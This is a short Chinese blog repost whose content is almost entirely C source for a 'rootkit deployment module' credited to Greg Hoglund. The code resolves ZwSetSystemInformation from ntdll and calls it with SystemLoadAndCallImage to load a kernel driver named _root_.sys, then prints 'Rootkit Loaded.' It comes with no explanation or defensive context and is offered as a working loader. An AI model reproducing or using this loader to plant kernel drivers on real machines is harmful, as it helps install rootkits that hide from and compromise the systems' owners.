用ZwSetSystemInformation函数的SystemLoadAndCallImage调用驱动-白红宇

用ZwSetSystemInformation函数的SystemLoadAndCallImage调用驱动

阅读量：6794 次

发布时间：2019-06-26

本文共 1730 字，大约阅读时间需要 5 分钟。

// New Deployment Module for rootkit 040 // ------------------------------------- // -Greg Hoglund http://www.rootkit.com  #include 
    
      #include 
     
       typedef struct _UNICODE_STRING {     USHORT Length;     USHORT MaximumLength; #ifdef MIDL_PASS     [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer; #else // MIDL_PASS     PWSTR  Buffer; #endif // MIDL_PASS } UNICODE_STRING, *PUNICODE_STRING; typedef unsigned long NTSTATUS; #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) NTSTATUS (__stdcall *ZwSetSystemInformation)(   IN DWORD SystemInformationClass,   IN OUT PVOID SystemInformation,   IN ULONG SystemInformationLength   ); VOID (__stdcall *RtlInitUnicodeString)(   IN OUT PUNICODE_STRING  DestinationString,   IN PCWSTR  SourceString   ); typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE {  UNICODE_STRING ModuleName; } SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE; #define SystemLoadAndCallImage 38 void main(void) { 	/// 	// Why mess with Drivers? 	/// 	SYSTEM_LOAD_AND_CALL_IMAGE GregsImage; 	WCHAR daPath[] = L"\\??\\C:\\_root_.sys"; 	// 	// get DLL entry points 	// 	if( !(RtlInitUnicodeString = 		(void *) GetProcAddress( GetModuleHandle("ntdll.dll"), 		"RtlInitUnicodeString" )) ) 		exit(1); 	if( !(ZwSetSystemInformation = 		(void *) GetProcAddress( GetModuleHandle("ntdll.dll"), 		"ZwSetSystemInformation" )) ) 		exit(1); 	RtlInitUnicodeString(  &(GregsImage.ModuleName), 		daPath ); 	if NT_SUCCESS( 		ZwSetSystemInformation(  SystemLoadAndCallImage, 		&GregsImage, 		sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ) 	{ 		printf("Rootkit Loaded.\n"); 	} 	else 	{ 		printf("Rootkit not loaded.\n"); 	} }

转载于:https://www.cnblogs.com/fanzi2009/archive/2010/03/19/1689645.html

你可能感兴趣的文章

python+selenium 对于iframe的切入切出